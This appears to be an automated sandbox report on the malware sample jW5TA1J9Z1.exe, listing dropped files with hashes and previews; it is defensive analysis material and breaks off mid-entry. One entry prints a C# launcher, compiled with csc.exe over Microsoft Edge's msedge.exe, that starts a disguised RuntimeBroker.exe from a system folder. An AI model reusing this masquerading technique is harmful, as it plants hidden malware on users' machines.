                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\2lKAyjhDI3

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.0.cs

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                    Category:dropped
                                                                    Size (bytes):403
                                                                    Entropy (8bit):4.969058551687233
                                                                    Encrypted:false
                                                                    SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLL3iFkD:JNVQIbSfhWLzIiFkMSfhnSFkD
                                                                    MD5:F5BA3C3BD98B46EA61FE50FE98B64506
                                                                    SHA1:D26262FB650D78CCC65CF399326BEFAE5E88FBAE
                                                                    SHA-256:04086117A5AA5D5D5CEC2662FFC45877C1C6BDA94AECB550FD825CF9DF27263C
                                                                    SHA-512:F85FD82BA8724F72AD211B2DFC2A7B2C319EA630EE1062627C8E420DA725EE30E86A2F606C348957A2CFB50E9A236A126F7328A8B0F4CF9EA277044878AB2869
                                                                    Malicious:false
                                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\AppReadiness\RuntimeBroker.exe"); } catch { } }).Start();. }.}.

                                                                    C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):269
                                                                    Entropy (8bit):5.209935960318579
                                                                    Encrypted:false
                                                                    SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8ocNwi23fRH:Hu7L//TRRzscQlZ5
                                                                    MD5:97E416C6389A0AF31778201020B4A89F
                                                                    SHA1:6DA4AABE0C30599ED1F3E49B45BAA31CF4C60C8F
                                                                    SHA-256:0B5AA20C9F796A03976A88E67091E3B4667AAF0A46B9B292DB4908A93CAEFCBB
                                                                    SHA-512:3BC30D6663200B1A8593583206AAA09875F3D449981C50BEFE2B7C827A72C80935777AEBE5234A8EB2DDB0CF7BCBAD52DF02F43150A072AF9ED7AD49DDCEE987
                                                                    Malicious:true
                                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.0.cs"

                                                                    C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.out

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (352), with CRLF, CR line terminators
                                                                    Category:modified
                                                                    Size (bytes):773
                                                                    Entropy (8bit):5.25756860571062
                                                                    Encrypted:false
                                                                    SSDEEP:24:KwI/un/VRzstD8Kax5DqBVKVrdFAMBJTH:xN/VRzE8K2DcVKdBJj
                                                                    MD5:C373BD79131A6A1AD2D0E2EADF2AE954
                                                                    SHA1:0DD3D43A64F88D3F978D1849C347C605C5D821DC
                                                                    SHA-256:A1BF7F856056073823AE2F7A8CDA37F22D9206F3803134A23D1FB0C36B815AE5
                                                                    SHA-512:EE71BF2BB473CEAE0CCE50B386A07BF05B346081077E0F5909279D6FBA73AD4051FAC11C65BDF2015929996110A4D22F9F42B3F460BF64A071646159014B98AC
                                                                    Malicious:false
                                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                    C:\Users\user\AppData\Local\Temp\39MKNguj26

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\3NhCqcmwaI

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\3RDL0VaJmz

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\3TQ3fG3Pkh

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\3UqRvBZzuI

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\3gWmmECrMh

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\4BeU2bjjLT

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\4Cpz8QB9UI

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\4eXxBSCDk2

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\4io4GSbWzV

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\4lriXsca0L

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\4nWCX81PQA

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\4rlcmF9Z2r

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\52xGG1rBMW

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\5DlqCjTCob

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\5Er47DSqTb

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\5FNZ6uB5cA

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\5NU0VAqRTn

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\5XzwzWvib2

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\5a09zl2EIw

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
